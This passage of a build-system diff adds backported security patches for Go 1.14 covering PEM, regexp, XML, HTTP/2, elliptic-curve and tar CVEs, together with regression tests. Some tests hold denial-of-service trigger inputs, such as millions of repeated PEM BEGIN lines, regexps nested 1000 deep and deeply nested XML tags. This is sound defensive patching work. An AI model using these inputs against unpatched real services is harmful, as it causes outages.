+diff --git a/src/crypto/elliptic/p224.go b/src/crypto/elliptic/p224.go
+index 8c76021..f1bfd7e 100644
+--- a/src/crypto/elliptic/p224.go
++++ b/src/crypto/elliptic/p224.go
+@@ -48,6 +48,12 @@ func (curve p224Curve) Params() *CurveParams {
+ }
+
+ func (curve p224Curve) IsOnCurve(bigX, bigY *big.Int) bool {
++
++ if bigX.Sign() < 0 || bigX.Cmp(curve.P) >= 0 ||
++ bigY.Sign() < 0 || bigY.Cmp(curve.P) >= 0 {
++ return false
++ }
++
+ var x, y p224FieldElement
+ p224FromBig(&x, bigX)
+ p224FromBig(&y, bigY)
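
Both hunks above add the same precondition: reject coordinates that are not canonical field elements (negative, or not reduced modulo P) before any curve arithmetic runs. The sketch below pulls that range check into a standalone helper, inField, which is an invented name for illustration rather than anything in crypto/elliptic.

package main

import (
    "crypto/elliptic"
    "fmt"
    "math/big"
)

// inField reports whether v is a canonical field element, i.e. 0 <= v < p.
// This is the same range check the patch inserts at the top of IsOnCurve,
// written as a standalone helper for illustration.
func inField(v, p *big.Int) bool {
    return v.Sign() >= 0 && v.Cmp(p) < 0
}

func main() {
    p := elliptic.P224().Params().P

    fmt.Println(inField(big.NewInt(1), p))                      // true
    fmt.Println(inField(big.NewInt(-1), p))                     // false: negative
    fmt.Println(inField(new(big.Int).Add(p, big.NewInt(1)), p)) // false: not reduced mod p
}
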
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch
new file mode 100644
index 0000000000..4bc012be21
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch
@@ -0,0 +1,271 @@
+From 1eb931d60a24501a9668e5cb4647593e19115507 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 17 Jun 2022 12:22:53 +0530
+Subject: [PATCH] CVE-2022-24675
+
+Upstream-Status: Backport [https://go-review.googlesource.com/c/go/+/399816/]
+CVE: CVE-2022-24675
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/encoding/pem/pem.go | 174 +++++++++++++++--------------------
+ src/encoding/pem/pem_test.go | 28 +++++-
+ 2 files changed, 101 insertions(+), 101 deletions(-)
+
+diff --git a/src/encoding/pem/pem.go b/src/encoding/pem/pem.go
+index a7272da..1bee1c1 100644
+--- a/src/encoding/pem/pem.go
++++ b/src/encoding/pem/pem.go
+@@ -87,123 +87,97 @@ func Decode(data []byte) (p *Block, rest []byte) {
+ // pemStart begins with a newline. However, at the very beginning of
+ // the byte array, we'll accept the start string without it.
+ rest = data
+- if bytes.HasPrefix(data, pemStart[1:]) {
+- rest = rest[len(pemStart)-1 : len(data)]
+- } else if i := bytes.Index(data, pemStart); i >= 0 {
+- rest = rest[i+len(pemStart) : len(data)]
+- } else {
+- return nil, data
+- }
+-
+- typeLine, rest := getLine(rest)
+- if !bytes.HasSuffix(typeLine, pemEndOfLine) {
+- return decodeError(data, rest)
+- }
+- typeLine = typeLine[0 : len(typeLine)-len(pemEndOfLine)]
+-
+- p = &Block{
+- Headers: make(map[string]string),
+- Type: string(typeLine),
+- }
+-
+ for {
+- // This loop terminates because getLine's second result is
+- // always smaller than its argument.
+- if len(rest) == 0 {
++ if bytes.HasPrefix(rest, pemStart[1:]) {
++ rest = rest[len(pemStart)-1:]
++ } else if i := bytes.Index(rest, pemStart); i >= 0 {
++ rest = rest[i+len(pemStart) : len(rest)]
++ } else {
+ return nil, data
+ }
+- line, next := getLine(rest)
+
+- i := bytes.IndexByte(line, ':')
+- if i == -1 {
+- break
++ var typeLine []byte
++ typeLine, rest = getLine(rest)
++ if !bytes.HasSuffix(typeLine, pemEndOfLine) {
++ continue
+ }
++ typeLine = typeLine[0 : len(typeLine)-len(pemEndOfLine)]
+
+- // TODO(agl): need to cope with values that spread across lines.
+- key, val := line[:i], line[i+1:]
+- key = bytes.TrimSpace(key)
+- val = bytes.TrimSpace(val)
+- p.Headers[string(key)] = string(val)
+- rest = next
+- }
++ p = &Block{
++ Headers: make(map[string]string),
++ Type: string(typeLine),
++ }
+
+- var endIndex, endTrailerIndex int
++ for {
++ // This loop terminates because getLine's second result is
++ // always smaller than its argument.
++ if len(rest) == 0 {
++ return nil, data
++ }
++ line, next := getLine(rest)
+
+- // If there were no headers, the END line might occur
+- // immediately, without a leading newline.
+- if len(p.Headers) == 0 && bytes.HasPrefix(rest, pemEnd[1:]) {
+- endIndex = 0
+- endTrailerIndex = len(pemEnd) - 1
+- } else {
+- endIndex = bytes.Index(rest, pemEnd)
+- endTrailerIndex = endIndex + len(pemEnd)
+- }
++ i := bytes.IndexByte(line, ':')
++ if i == -1 {
++ break
++ }
+
+- if endIndex < 0 {
+- return decodeError(data, rest)
+- }
++ // TODO(agl): need to cope with values that spread across lines.
++ key, val := line[:i], line[i+1:]
++ key = bytes.TrimSpace(key)
++ val = bytes.TrimSpace(val)
++ p.Headers[string(key)] = string(val)
++ rest = next
++ }
+
+- // After the "-----" of the ending line, there should be the same type
+- // and then a final five dashes.
+- endTrailer := rest[endTrailerIndex:]
+- endTrailerLen := len(typeLine) + len(pemEndOfLine)
+- if len(endTrailer) < endTrailerLen {
+- return decodeError(data, rest)
+- }
++ var endIndex, endTrailerIndex int
+
+- restOfEndLine := endTrailer[endTrailerLen:]
+- endTrailer = endTrailer[:endTrailerLen]
+- if !bytes.HasPrefix(endTrailer, typeLine) ||
+- !bytes.HasSuffix(endTrailer, pemEndOfLine) {
+- return decodeError(data, rest)
+- }
++ // If there were no headers, the END line might occur
++ // immediately, without a leading newline.
++ if len(p.Headers) == 0 && bytes.HasPrefix(rest, pemEnd[1:]) {
++ endIndex = 0
++ endTrailerIndex = len(pemEnd) - 1
++ } else {
++ endIndex = bytes.Index(rest, pemEnd)
++ endTrailerIndex = endIndex + len(pemEnd)
++ }
+
+- // The line must end with only whitespace.
+- if s, _ := getLine(restOfEndLine); len(s) != 0 {
+- return decodeError(data, rest)
+- }
++ if endIndex < 0 {
++ continue
++ }
+
+- base64Data := removeSpacesAndTabs(rest[:endIndex])
+- p.Bytes = make([]byte, base64.StdEncoding.DecodedLen(len(base64Data)))
+- n, err := base64.StdEncoding.Decode(p.Bytes, base64Data)
+- if err != nil {
+- return decodeError(data, rest)
+- }
+- p.Bytes = p.Bytes[:n]
++ // After the "-----" of the ending line, there should be the same type
++ // and then a final five dashes.
++ endTrailer := rest[endTrailerIndex:]
++ endTrailerLen := len(typeLine) + len(pemEndOfLine)
++ if len(endTrailer) < endTrailerLen {
++ continue
++ }
++
++ restOfEndLine := endTrailer[endTrailerLen:]
++ endTrailer = endTrailer[:endTrailerLen]
++ if !bytes.HasPrefix(endTrailer, typeLine) ||
++ !bytes.HasSuffix(endTrailer, pemEndOfLine) {
++ continue
++ }
+
+- // the -1 is because we might have only matched pemEnd without the
+- // leading newline if the PEM block was empty.
+- _, rest = getLine(rest[endIndex+len(pemEnd)-1:])
++ // The line must end with only whitespace.
++ if s, _ := getLine(restOfEndLine); len(s) != 0 {
++ continue
++ }
+
+- return
+-}
++ base64Data := removeSpacesAndTabs(rest[:endIndex])
++ p.Bytes = make([]byte, base64.StdEncoding.DecodedLen(len(base64Data)))
++ n, err := base64.StdEncoding.Decode(p.Bytes, base64Data)
++ if err != nil {
++ continue
++ }
++ p.Bytes = p.Bytes[:n]
+
+-func decodeError(data, rest []byte) (*Block, []byte) {
+- // If we get here then we have rejected a likely looking, but
+- // ultimately invalid PEM block. We need to start over from a new
+- // position. We have consumed the preamble line and will have consumed
+- // any lines which could be header lines. However, a valid preamble
+- // line is not a valid header line, therefore we cannot have consumed
+- // the preamble line for the any subsequent block. Thus, we will always
+- // find any valid block, no matter what bytes precede it.
+- //
+- // For example, if the input is
+- //
+- // -----BEGIN MALFORMED BLOCK-----
+- // junk that may look like header lines
+- // or data lines, but no END line
+- //
+- // -----BEGIN ACTUAL BLOCK-----
+- // realdata
+- // -----END ACTUAL BLOCK-----
+- //
+- // we've failed to parse using the first BEGIN line
+- // and now will try again, using the second BEGIN line.
+- p, rest := Decode(rest)
+- if p == nil {
+- rest = data
++ // the -1 is because we might have only matched pemEnd without the
++ // leading newline if the PEM block was empty.
++ _, rest = getLine(rest[endIndex+len(pemEnd)-1:])
++ return p, rest
+ }
+- return p, rest
+ }
+
+ const pemLineLength = 64
+diff --git a/src/encoding/pem/pem_test.go b/src/encoding/pem/pem_test.go
+index 8515b46..4485581 100644
+--- a/src/encoding/pem/pem_test.go
++++ b/src/encoding/pem/pem_test.go
+@@ -107,6 +107,12 @@ const pemMissingEndingSpace = `
+ dGVzdA==
+ -----ENDBAR-----`
+
++const pemMissingEndLine = `
++-----BEGIN FOO-----
++Header: 1`
++
++var pemRepeatingBegin = strings.Repeat("-----BEGIN \n", 10)
++
+ var badPEMTests = []struct {
+ name string
+ input string
+@@ -131,14 +137,34 @@ var badPEMTests = []struct {
+ "missing ending space",
+ pemMissingEndingSpace,
+ },
++ {
++ "repeating begin",
++ pemRepeatingBegin,
++ },
++ {
++ "missing end line",
++ pemMissingEndLine,
++ },
+ }
+
+ func TestBadDecode(t *testing.T) {
+ for _, test := range badPEMTests {
+- result, _ := Decode([]byte(test.input))
++ result, rest := Decode([]byte(test.input))
+ if result != nil {
+ t.Errorf("unexpected success while parsing %q", test.name)
+ }
++ if string(rest) != test.input {
++ t.Errorf("unexpected rest: %q; want = %q", rest, test.input)
++ }
++ }
++}
++
++func TestCVE202224675(t *testing.T) {
++ // Prior to CVE-2022-24675, this input would cause a stack overflow.
++ input := []byte(strings.Repeat("-----BEGIN \n", 10000000))
++ result, rest := Decode(input)
++ if result != nil || !reflect.DeepEqual(rest, input) {
++ t.Errorf("Encode of %#v decoded as %#v", input, rest)
+ }
+ }
+
+--
+2.25.1
+
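
The PEM change above turns recursion-on-failure into one outer loop, so an input consisting of millions of malformed BEGIN lines costs time but not stack. The toy scanner below reproduces that shape for a much simpler line-based format; the BEGIN/END markers and the firstBlock name are assumptions made for the example, not encoding/pem itself.

package main

import (
    "fmt"
    "strings"
)

// firstBlock returns the lines between the first well-formed BEGIN/END pair.
// When a candidate turns out to be malformed (another BEGIN appears before an
// END), the scan resumes at that later BEGIN via the outer loop instead of a
// recursive call, so huge numbers of bogus BEGIN lines cost time, not stack.
func firstBlock(lines []string) (body []string, ok bool) {
scan:
    for i := 0; i < len(lines); i++ {
        if lines[i] != "BEGIN" {
            continue
        }
        for j := i + 1; j < len(lines); j++ {
            switch lines[j] {
            case "END":
                return lines[i+1 : j], true
            case "BEGIN":
                // Malformed candidate: restart at this later BEGIN.
                i = j - 1
                continue scan
            }
        }
    }
    return nil, false
}

func main() {
    input := strings.Repeat("BEGIN\n", 100_000) + "payload\nEND"
    body, ok := firstBlock(strings.Split(input, "\n"))
    fmt.Println(ok, body) // true [payload]
}
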
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch
new file mode 100644
index 0000000000..e4270d8a75
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch
@@ -0,0 +1,198 @@
+From ba99f699d26483ea1045f47c760e9be30799e311 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Wed, 2 Feb 2022 16:41:32 -0500
+Subject: [PATCH] regexp/syntax: reject very deeply nested regexps in Parse
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/2b65cde5868d8245ef8a0b8eba1e361440252d3b]
+CVE: CVE-2022-24921
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+The regexp code assumes it can recurse over the structure of
+a regexp safely. Go's growable stacks make that reasonable
+for all plausible regexps, but implausible ones can reach the
+“infinite recursion?” stack limit.
+
+This CL limits the depth of any parsed regexp to 1000.
+That is, the depth of the parse tree is required to be ≤ 1000.
+Regexps that require deeper parse trees will return ErrInternalError.
+A future CL will change the error to ErrInvalidDepth,
+but using ErrInternalError for now avoids introducing new API
+in point releases when this is backported.
+
+Fixes #51112.
+Fixes #51117.
+
+Change-Id: I97d2cd82195946eb43a4ea8561f5b95f91fb14c5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/384616
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+Reviewed-by: Ian Lance Taylor <iant@golang.org>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/384855
+---
+ src/regexp/syntax/parse.go | 72 ++++++++++++++++++++++++++++++++-
+ src/regexp/syntax/parse_test.go | 7 ++++
+ 2 files changed, 77 insertions(+), 2 deletions(-)
+
+diff --git a/src/regexp/syntax/parse.go b/src/regexp/syntax/parse.go
+index 8c6d43a..55bd20d 100644
+--- a/src/regexp/syntax/parse.go
++++ b/src/regexp/syntax/parse.go
+@@ -76,13 +76,29 @@ const (
+ opVerticalBar
+ )
+
++// maxHeight is the maximum height of a regexp parse tree.
++// It is somewhat arbitrarily chosen, but the idea is to be large enough
++// that no one will actually hit in real use but at the same time small enough
++// that recursion on the Regexp tree will not hit the 1GB Go stack limit.
++// The maximum amount of stack for a single recursive frame is probably
++// closer to 1kB, so this could potentially be raised, but it seems unlikely
++// that people have regexps nested even this deeply.
++// We ran a test on Google's C++ code base and turned up only
++// a single use case with depth > 100; it had depth 128.
++// Using depth 1000 should be plenty of margin.
++// As an optimization, we don't even bother calculating heights
++// until we've allocated at least maxHeight Regexp structures.
++const maxHeight = 1000
++
+ type parser struct {
+ flags Flags // parse mode flags
+ stack []*Regexp // stack of parsed expressions
+ free *Regexp
+ numCap int // number of capturing groups seen
+ wholeRegexp string
+- tmpClass []rune // temporary char class work space
++ tmpClass []rune // temporary char class work space
++ numRegexp int // number of regexps allocated
++ height map[*Regexp]int // regexp height for height limit check
+ }
+
+ func (p *parser) newRegexp(op Op) *Regexp {
+@@ -92,16 +108,52 @@ func (p *parser) newRegexp(op Op) *Regexp {
+ *re = Regexp{}
+ } else {
+ re = new(Regexp)
++ p.numRegexp++
+ }
+ re.Op = op
+ return re
+ }
+
+ func (p *parser) reuse(re *Regexp) {
++ if p.height != nil {
++ delete(p.height, re)
++ }
+ re.Sub0[0] = p.free
+ p.free = re
+ }
+
++func (p *parser) checkHeight(re *Regexp) {
++ if p.numRegexp < maxHeight {
++ return
++ }
++ if p.height == nil {
++ p.height = make(map[*Regexp]int)
++ for _, re := range p.stack {
++ p.checkHeight(re)
++ }
++ }
++ if p.calcHeight(re, true) > maxHeight {
++ panic(ErrInternalError)
++ }
++}
++
++func (p *parser) calcHeight(re *Regexp, force bool) int {
++ if !force {
++ if h, ok := p.height[re]; ok {
++ return h
++ }
++ }
++ h := 1
++ for _, sub := range re.Sub {
++ hsub := p.calcHeight(sub, false)
++ if h < 1+hsub {
++ h = 1 + hsub
++ }
++ }
++ p.height[re] = h
++ return h
++}
++
+ // Parse stack manipulation.
+
+ // push pushes the regexp re onto the parse stack and returns the regexp.
+@@ -137,6 +189,7 @@ func (p *parser) push(re *Regexp) *Regexp {
+ }
+
+ p.stack = append(p.stack, re)
++ p.checkHeight(re)
+ return re
+ }
+
+@@ -252,6 +305,7 @@ func (p *parser) repeat(op Op, min, max int, before, after, lastRepeat string) (
+ re.Sub = re.Sub0[:1]
+ re.Sub[0] = sub
+ p.stack[n-1] = re
++ p.checkHeight(re)
+
+ if op == OpRepeat && (min >= 2 || max >= 2) && !repeatIsValid(re, 1000) {
+ return "", &Error{ErrInvalidRepeatSize, before[:len(before)-len(after)]}
+@@ -699,6 +753,21 @@ func literalRegexp(s string, flags Flags) *Regexp {
+ // Flags, and returns a regular expression parse tree. The syntax is
+ // described in the top-level comment.
+ func Parse(s string, flags Flags) (*Regexp, error) {
++ return parse(s, flags)
++}
++
++func parse(s string, flags Flags) (_ *Regexp, err error) {
++ defer func() {
++ switch r := recover(); r {
++ default:
++ panic(r)
++ case nil:
++ // ok
++ case ErrInternalError:
++ err = &Error{Code: ErrInternalError, Expr: s}
++ }
++ }()
++
+ if flags&Literal != 0 {
+ // Trivial parser for literal string.
+ if err := checkUTF8(s); err != nil {
+@@ -710,7 +779,6 @@ func Parse(s string, flags Flags) (*Regexp, error) {
+ // Otherwise, must do real work.
+ var (
+ p parser
+- err error
+ c rune
+ op Op
+ lastRepeat string
+diff --git a/src/regexp/syntax/parse_test.go b/src/regexp/syntax/parse_test.go
+index 5581ba1..1ef6d8a 100644
+--- a/src/regexp/syntax/parse_test.go
++++ b/src/regexp/syntax/parse_test.go
+@@ -207,6 +207,11 @@ var parseTests = []parseTest{
+ // Valid repetitions.
+ {`((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}))`, ``},
+ {`((((((((((x{1}){2}){2}){2}){2}){2}){2}){2}){2}){2})`, ``},
++
++ // Valid nesting.
++ {strings.Repeat("(", 999) + strings.Repeat(")", 999), ``},
++ {strings.Repeat("(?:", 999) + strings.Repeat(")*", 999), ``},
++ {"(" + strings.Repeat("|", 12345) + ")", ``}, // not nested at all
+ }
+
+ const testFlags = MatchNL | PerlX | UnicodeGroups
+@@ -482,6 +487,8 @@ var invalidRegexps = []string{
+ `a{100000}`,
+ `a{100000,}`,
+ "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})",
++ strings.Repeat("(", 1000) + strings.Repeat(")", 1000),
++ strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000),
+ `\Q\E*`,
+ }
+
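
The regexp/syntax backport rejects parse trees taller than 1000 nodes, computing a node's height as one plus its tallest child. The sketch below measures tree height the same way on the public syntax.Regexp type; the limit of 100 is an arbitrary demo value chosen so the second example trips it, and checkHeight is not part of the library.

package main

import (
    "errors"
    "fmt"
    "regexp/syntax"
    "strings"
)

// maxHeight is an arbitrary demo value; the backport above uses 1000.
const maxHeight = 100

// height computes the height of a parse tree as 1 plus the tallest child,
// the same measure the patch's calcHeight uses.
func height(re *syntax.Regexp) int {
    h := 1
    for _, sub := range re.Sub {
        if hs := height(sub); h < 1+hs {
            h = 1 + hs
        }
    }
    return h
}

func checkHeight(re *syntax.Regexp) error {
    if height(re) > maxHeight {
        return errors.New("regexp parse tree too tall")
    }
    return nil
}

func main() {
    shallow, _ := syntax.Parse(`(a|b)+c`, syntax.Perl)
    fmt.Println("shallow:", height(shallow), checkHeight(shallow))

    deep, err := syntax.Parse(strings.Repeat("(", 500)+"x"+strings.Repeat(")", 500), syntax.Perl)
    if err != nil {
        // A Go with the backport applied enforces its own depth limit here.
        fmt.Println("parse error:", err)
        return
    }
    fmt.Println("deep:   ", height(deep), checkHeight(deep))
}
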
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch
new file mode 100644
index 0000000000..238c3eac5b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch
@@ -0,0 +1,68 @@
+From 48c9076dcfc2dc894842ff758c8cfae7957c9565 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 29 Sep 2022 17:06:18 +0530
+Subject: [PATCH] CVE-2022-27664
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479]
+CVE: CVE-2022-27664
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/net/http/h2_bundle.go | 21 +++++++++++++--------
+ 1 file changed, 13 insertions(+), 8 deletions(-)
+
+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 65d851d..83f2a72 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -3254,10 +3254,11 @@ var (
+ // name (key). See httpguts.ValidHeaderName for the base rules.
+ //
+ // Further, http2 says:
+-// "Just as in HTTP/1.x, header field names are strings of ASCII
+-// characters that are compared in a case-insensitive
+-// fashion. However, header field names MUST be converted to
+-// lowercase prior to their encoding in HTTP/2. "
++//
++// "Just as in HTTP/1.x, header field names are strings of ASCII
++// characters that are compared in a case-insensitive
++// fashion. However, header field names MUST be converted to
++// lowercase prior to their encoding in HTTP/2. "
+ func http2validWireHeaderFieldName(v string) bool {
+ if len(v) == 0 {
+ return false
+@@ -3446,8 +3447,8 @@ func (s *http2sorter) SortStrings(ss []string) {
+ // validPseudoPath reports whether v is a valid :path pseudo-header
+ // value. It must be either:
+ //
+-// *) a non-empty string starting with '/'
+-// *) the string '*', for OPTIONS requests.
++// *) a non-empty string starting with '/'
++// *) the string '*', for OPTIONS requests.
+ //
+ // For now this is only used a quick check for deciding when to clean
+ // up Opaque URLs before sending requests from the Transport.
+@@ -4897,6 +4898,9 @@ func (sc *http2serverConn) startGracefulShutdownInternal() {
+ func (sc *http2serverConn) goAway(code http2ErrCode) {
+ sc.serveG.check()
+ if sc.inGoAway {
++ if sc.goAwayCode == http2ErrCodeNo {
++ sc.goAwayCode = code
++ }
+ return
+ }
+ sc.inGoAway = true
+@@ -6091,8 +6095,9 @@ func (rws *http2responseWriterState) writeChunk(p []byte) (n int, err error) {
+ // prior to the headers being written. If the set of trailers is fixed
+ // or known before the header is written, the normal Go trailers mechanism
+ // is preferred:
+-// https://golang.org/pkg/net/http/#ResponseWriter
+-// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
++//
++// https://golang.org/pkg/net/http/#ResponseWriter
++// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
+ const http2TrailerPrefix = "Trailer:"
+
+ // promoteUndeclaredTrailers permits http.Handlers to set trailers
+--
+2.25.1
+
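
Besides the comment reflow, the functional change above is small: a connection already in graceful GOAWAY with the benign "no error" code now records a later, real error code instead of discarding it. Below is a tiny sketch of that keep-the-first-meaningful-reason pattern, with invented types that only stand in for the http2 internals.

package main

import "fmt"

type errCode int

const (
    errCodeNo errCode = iota
    errCodeProtocol
)

type conn struct {
    inGoAway   bool
    goAwayCode errCode
}

// goAway records the reason a connection is shutting down. Once shutdown has
// begun with the benign errCodeNo, a later call carrying a real error
// upgrades the stored code instead of being dropped, mirroring the hunk above.
func (c *conn) goAway(code errCode) {
    if c.inGoAway {
        if c.goAwayCode == errCodeNo {
            c.goAwayCode = code
        }
        return
    }
    c.inGoAway = true
    c.goAwayCode = code
}

func main() {
    var c conn
    c.goAway(errCodeNo)       // graceful shutdown starts
    c.goAway(errCodeProtocol) // a real error arrives afterwards
    fmt.Println(c.goAwayCode) // prints 1: the protocol error is preserved
}
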
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch
new file mode 100644
index 0000000000..8afa292144
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch
@@ -0,0 +1,104 @@
+From 8136eb2e5c316a51d0da710fbd0504cbbefee526 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Mon, 28 Mar 2022 18:41:26 -0700
+Subject: [PATCH] encoding/xml: use iterative Skip, rather than recursive
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/58facfbe7db2fbb9afed794b281a70bdb12a60ae]
+CVE: CVE-2022-28131
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Prevents exhausting the stack limit in _incredibly_ deeply nested
+structures.
+
+Fixes #53711
+Updates #53614
+Fixes CVE-2022-28131
+
+Change-Id: I47db4595ce10cecc29fbd06afce7b299868599e6
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1419912
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 9278cb78443d2b4deb24cbb5b61c9ba5ac688d49)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/417068
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Heschi Kreinick <heschi@google.com>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+---
+ src/encoding/xml/read.go | 15 ++++++++-------
+ src/encoding/xml/read_test.go | 18 ++++++++++++++++++
+ 2 files changed, 26 insertions(+), 7 deletions(-)
+
+diff --git a/src/encoding/xml/read.go b/src/encoding/xml/read.go
+index 4ffed80..3fac859 100644
+--- a/src/encoding/xml/read.go
++++ b/src/encoding/xml/read.go
+@@ -743,12 +743,12 @@ Loop:
+ }
+
+ // Skip reads tokens until it has consumed the end element
+-// matching the most recent start element already consumed.
+-// It recurs if it encounters a start element, so it can be used to
+-// skip nested structures.
++// matching the most recent start element already consumed,
++// skipping nested structures.
+ // It returns nil if it finds an end element matching the start
+ // element; otherwise it returns an error describing the problem.
+ func (d *Decoder) Skip() error {
++ var depth int64
+ for {
+ tok, err := d.Token()
+ if err != nil {
+@@ -756,11 +756,12 @@ func (d *Decoder) Skip() error {
+ }
+ switch tok.(type) {
+ case StartElement:
+- if err := d.Skip(); err != nil {
+- return err
+- }
++ depth++
+ case EndElement:
+- return nil
++ if depth == 0 {
++ return nil
++ }
++ depth--
+ }
+ }
+ }
+diff --git a/src/encoding/xml/read_test.go b/src/encoding/xml/read_test.go
+index 6a20b1a..7a621a5 100644
+--- a/src/encoding/xml/read_test.go
++++ b/src/encoding/xml/read_test.go
+@@ -5,9 +5,11 @@
+ package xml
+
+ import (
++ "bytes"
+ "errors"
+ "io"
+ "reflect"
++ "runtime"
+ "strings"
+ "testing"
+ "time"
+@@ -1093,3 +1095,19 @@ func TestCVE202228131(t *testing.T) {
+ t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errExeceededMaxUnmarshalDepth)
+ }
+ }
++
++func TestCVE202230633(t *testing.T) {
++ if runtime.GOARCH == "wasm" {
++ t.Skip("causes memory exhaustion on js/wasm")
++ }
++ defer func() {
++ p := recover()
++ if p != nil {
++ t.Fatal("Unmarshal panicked")
++ }
++ }()
++ var example struct {
++ Things []string
++ }
++ Unmarshal(bytes.Repeat([]byte("<a>"), 17_000_000), &example)
++}
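
For context, a small caller-level sketch, separate from the backported patch itself, of the input shape the iterative Skip above guards against; the element name and nesting count are arbitrary:

package main

import (
	"encoding/xml"
	"fmt"
	"strings"
)

func main() {
	// 100,000 nested elements: the old recursive Skip used one stack frame
	// per level, while the patched version tracks nesting with a counter.
	const n = 100000
	payload := strings.Repeat("<a>", n) + strings.Repeat("</a>", n)
	d := xml.NewDecoder(strings.NewReader(payload))
	if _, err := d.Token(); err != nil { // consume the outermost <a>
		fmt.Println("token:", err)
		return
	}
	fmt.Println("skip:", d.Skip()) // nil once the matching </a> is reached
}
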
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch
new file mode 100644
index 0000000000..6361deec7d
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch
@@ -0,0 +1,36 @@
+From 34d9ab78568d63d8097911237897b188bdaba9c2 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Thu, 31 Mar 2022 12:31:58 -0400
+Subject: [PATCH] crypto/elliptic: tolerate zero-padded scalars in generic
+ P-256
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/7139e8b024604ab168b51b99c6e8168257a5bf58]
+CVE: CVE-2022-28327
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Updates #52075
+Fixes #52076
+Fixes CVE-2022-28327
+
+Change-Id: I595a7514c9a0aa1b9c76aedfc2307e1124271f27
+Reviewed-on: https://go-review.googlesource.com/c/go/+/397136
+Trust: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Julie Qiu <julie@golang.org>
+---
+ src/crypto/elliptic/p256.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/crypto/elliptic/p256.go b/src/crypto/elliptic/p256.go
+index c23e414..787e3e7 100644
+--- a/src/crypto/elliptic/p256.go
++++ b/src/crypto/elliptic/p256.go
+@@ -51,7 +51,7 @@ func p256GetScalar(out *[32]byte, in []byte) {
+ n := new(big.Int).SetBytes(in)
+ var scalarBytes []byte
+
+- if n.Cmp(p256Params.N) >= 0 {
++ if n.Cmp(p256Params.N) >= 0 || len(in) > len(out) {
+ n.Mod(n, p256Params.N)
+ scalarBytes = n.Bytes()
+ } else {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch
new file mode 100644
index 0000000000..ea04a82d16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch
@@ -0,0 +1,111 @@
+From 9d339f1d0f53c4116a7cb4acfa895f31a07212ee Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Fri, 2 Sep 2022 20:45:18 -0700
+Subject: [PATCH] archive/tar: limit size of headers
+
+Set a 1MiB limit on special file blocks (PAX headers, GNU long names,
+GNU link names), to avoid reading arbitrarily large amounts of data
+into memory.
+
+Thanks to Adam Korczynski (ADA Logics) and OSS-Fuzz for reporting
+this issue.
+
+Fixes CVE-2022-2879
+Updates #54853
+Fixes #55926
+
+Change-Id: I85136d6ff1e0af101a112190e027987ab4335680
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1565555
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit 6ee768cef6b82adf7a90dcf367a1699ef694f3b2)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1591053
